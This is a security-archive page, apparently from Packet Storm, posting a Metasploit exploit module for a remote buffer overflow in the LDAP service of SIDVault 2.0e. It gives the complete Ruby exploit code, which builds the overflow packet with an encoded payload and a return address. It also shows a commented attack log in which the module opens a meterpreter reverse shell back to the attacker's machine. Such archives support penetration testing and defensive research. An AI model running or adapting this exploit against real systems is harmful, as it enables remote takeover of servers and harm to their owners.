what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SIDVault 2.0e Windows Buffer Overflow

SIDVault 2.0e Windows Buffer Overflow
Posted Sep 4, 2009
Authored by His0k4

This Metasploit module exploits a buffer overflow in the LDAP service that is part of the SIDVault product. This module was tested against version 2.0e.

tags | exploit, overflow
SHA-256 | 7909249c5430e14d66058c61646983e17255bc1f37cd06ec40583c4488d67996

SIDVault 2.0e Windows Buffer Overflow

Change Mirror Download
#--attack-log--
#attacker@dz-labs:~/pentests/metasploit/framework-3.2/trunk$ ./msfcli exploit/windows/ldap/sidvault_ldap #PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 RHOST=192.168.1.3 E
#[*] Please wait while we load the module tree...
#[*] Handler binding to LHOST 0.0.0.0
#[*] Started reverse handler
#[*] Sending stage (718336 bytes)
#[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.3:1076)

#meterpreter >


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'SIDVault 2.0e Windows Remote Buffer Overflow',
'Description' => %q{
This exploits a buffer overflow in the LDAP service that is
part of the SIDVault product. This module was tested against
version 2.0e.

},
'Author' => [ 'His0k4 <his0k4.hlm[at]gmail.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.milw0rm.com/exploits/9586'],

],
'Privileged' => true,
'Payload' =>
{
'Space' => 750,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
#Tested against xp_sp3 OK
["Universal", { 'Ret' => "\x29\x10\x40" }], #p/p/r sidvault.exe
],
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(389)
], self.class)
end

def exploit
connect

sploit = "\x30\x82\x12\x10\x02\x01\x01\x60\x82\x12\x09\x02\x01\x03\x04\x82\x10\xfe"
sploit << "dc="
sploit << rand_text_alpha(1028)
sploit << payload.encoded
sploit << rand_text_alpha(3302 - payload.encoded.length)
sploit << "\xE8\x15\xF3\xFF\xFF"
sploit << make_nops(5)
sploit << "\xEB\xF4\x90\x90"
sploit << target.ret
sploit << "\x80\x82\x01\x00"
sploit << rand_text_alpha(500)

sock.put(sploit)

handler
end

end


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close